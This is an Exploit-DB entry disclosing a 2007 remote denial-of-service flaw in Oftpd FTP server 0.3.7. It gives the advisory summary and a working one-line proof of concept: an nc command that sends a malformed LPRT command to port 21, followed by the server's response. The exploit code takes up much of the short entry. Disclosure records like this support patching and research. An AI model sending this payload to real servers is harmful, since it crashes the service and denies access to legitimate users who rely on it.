Oftpd 0.3.7 - Unsupported Address Family Remote Denial of Service

EDB-ID:

29470

Author:

anonymous

Type:

dos

Platform:

Linux

Published:

2007-01-15

source: http://www.securityfocus.com/bid/22073/info

Oftpd Server is prone to a remote denial-of-service vulnerability because it mishandles unexpected user-supplied input.

Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users.

Oftpd Server 0.3.7 is reported vulnerable; other versions may also be affected.

nc www.example.com 21 <<< "LPRT 1,16,63,254,47,0,0,32,0,0,0,0,0,0,32,254,143,205,2,141,176"

220 Service ready for new user.
521 Only IPv4 supported, address family (4)